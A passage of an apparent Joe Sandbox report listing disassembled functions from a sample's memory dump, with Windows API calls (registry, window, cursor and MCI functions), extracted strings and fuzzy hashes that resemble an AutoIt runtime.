                                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0104DCD0,00000000,?,00000000,?,?), ref: 0103CFA4
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0103D004
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103D054
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103D0CF
                                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0103D112
                                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0103D221
                                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0103D2AD
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0103D2E1
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103D2EE
                                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0103D3C0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                                        • Opcode ID: caa45d792062326a2240c68911962032953e751d185b744ddf3fcf3ad727ab2b
                                                                                                                                                                                                                                                                                                        • Instruction ID: e1b8f7228845da04e5db515ef917befc318fd3ca3ee198361c041b9b5ef16e59
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: caa45d792062326a2240c68911962032953e751d185b744ddf3fcf3ad727ab2b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34125A356042019FD714DF59C881A6ABBEAEF88754F04849DF98A9B3A2CB35FD41CF81
                                                                                                                                                                                                                                                                                                        Function 010413BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 01041462
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0104149D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010414F0
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01041526
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010415A2
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0104161D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCFD52: _wcslen.LIBCMT ref: 00FCFD5D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01013535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01013547
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                                        • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4c30e9fbc51f3621835decd5ab68ca4b64de71fcbca8810095fa71af3dc824ad
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7393d6b862f990ea600869b8ee821b3dd1fd6e81b244ef1acb0d84f21fbaeb82
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c30e9fbc51f3621835decd5ab68ca4b64de71fcbca8810095fa71af3dc824ad
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8E1A1B16043018FC714DF29C5908AAB7E2BF98314B0489ADF8D69B762DB34FD85CB81
                                                                                                                                                                                                                                                                                                        Function 0103D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                        • Opcode ID: a38f089e82f367f8f1f20f426a5ac0904f6cf696ef863ff42fd276cee0221f12
                                                                                                                                                                                                                                                                                                        • Instruction ID: 361d983d09e1302479669c62caf43ea2b6237cb79e7a319ee0668ba17e8f3f3f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a38f089e82f367f8f1f20f426a5ac0904f6cf696ef863ff42fd276cee0221f12
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2714832A0011A8BCB119EBCCD005FF33EAAFD4258B950169FCE697295EB35DD54D3A0
                                                                                                                                                                                                                                                                                                        Function 01048D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048DB5
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048DC9
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048DEC
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01048E0F
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 01048E4D
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,01046691), ref: 01048EA9
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048EE2
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 01048F25
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048F5C
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 01048F68
                                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 01048F78
                                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,01046691), ref: 01048F87
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01048FA4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01048FB0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c75ea404ff4918ade9df7d748368849d283d54bbb0367129290006fc2d5f596
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6bb8bde7526bd4f69f5e81e691712f60c33366d05e3e5eabf08f1afec6230091
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c75ea404ff4918ade9df7d748368849d283d54bbb0367129290006fc2d5f596
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0161E3B1900204FBEB24DFA9CC85BBE77A9BF08B10F108956F955D61C1DB79A940DBA0
                                                                                                                                                                                                                                                                                                        Function 010248BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0102493D
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01024948
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0102499F
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010249DD
                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 01024A1B
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01024A63
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01024A9E
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01024ACC
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                        • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4e28f0215352b1e0b86af195d8bb72c4d7564c228045b0f538eb0998d84f0f3b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 37b8caf7d50e84b576a4a61137ddd540d5534f61707bc8cb90e009a560784478
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e28f0215352b1e0b86af195d8bb72c4d7564c228045b0f538eb0998d84f0f3b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D971D272A042158FC310EF29C8409AAB7E4FF98798F00496DF8D6D7252EB35DD45CB91
                                                                                                                                                                                                                                                                                                        Function 01016382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 01016395
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 010163A7
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 010163BE
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 010163D3
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 010163D9
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 010163E9
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 010163EF
                                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 01016410
                                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0101642A
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 01016433
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101649A
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 010164D6
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 010164DC
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 010164E3
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0101653A
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 01016547
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 0101656C
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01016596
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e2fbb2b819118953e14ab845ca66273864e3e16765888523e8b63f1bebec097b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6a3d779270db3945026a8b52c3216235409473985d089549292e4057427700ed
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2fbb2b819118953e14ab845ca66273864e3e16765888523e8b63f1bebec097b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3719E71900705AFDB20DFA8CE85AAEBBF5FF48704F104558E5C6A2598DBBAE940CB50
                                                                                                                                                                                                                                                                                                        Function 0103086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 01030884
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0103088F
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0103089A
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 010308A5
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 010308B0
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 010308BB
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 010308C6
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 010308D1
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 010308DC
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 010308E7
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 010308F2
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 010308FD
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 01030908
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 01030913
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0103091E
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 01030929
                                                                                                                                                                                                                                                                                                        • GetCursorInfo.USER32(?), ref: 01030939
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0103097B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dcbb5d0ea9844a3a64d002aa55f7d938480eec7b069177d58f993e0ecbe5a71b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 46f5d6e7596d8a8de7779899735d650e57986174528f4ba4653881260e8af5fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcbb5d0ea9844a3a64d002aa55f7d938480eec7b069177d58f993e0ecbe5a71b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 244161B0E083196BDB509FBA8C8986EBFE8BF44750B50456AF15CE7281DB78A401CF91
                                                                                                                                                                                                                                                                                                        Function 00FD0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FD0436
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0108170C,00000FA0,9835BB83,?,?,?,?,00FF2733,000000FF), ref: 00FD048C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00FF2733,000000FF), ref: 00FD0497
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00FF2733,000000FF), ref: 00FD04A8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FD04BE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FD04CC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FD04DA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD0505
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD0510
                                                                                                                                                                                                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00FD0457
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD0413: __onexit.LIBCMT ref: 00FD0419
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • kernel32.dll, xrefs: 00FD04A3
                                                                                                                                                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 00FD04C4
                                                                                                                                                                                                                                                                                                        • InitializeConditionVariable, xrefs: 00FD04B8
                                                                                                                                                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 00FD04D2
                                                                                                                                                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FD0492
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6ee9b47a22f6f99ad838889594048dd2b693dd2cac3ebcfed3409e082d8f260c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 96c6704047c1beeb9ad6eeaa949c6b03d77c8a741d2685838ef21b60259e0555
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ee9b47a22f6f99ad838889594048dd2b693dd2cac3ebcfed3409e082d8f260c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25213476A447047FD7217BA4AC4AB6E37A6EF05B61F08012FFD8196348DF7998009B61
                                                                                                                                                                                                                                                                                                        Function 01013A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
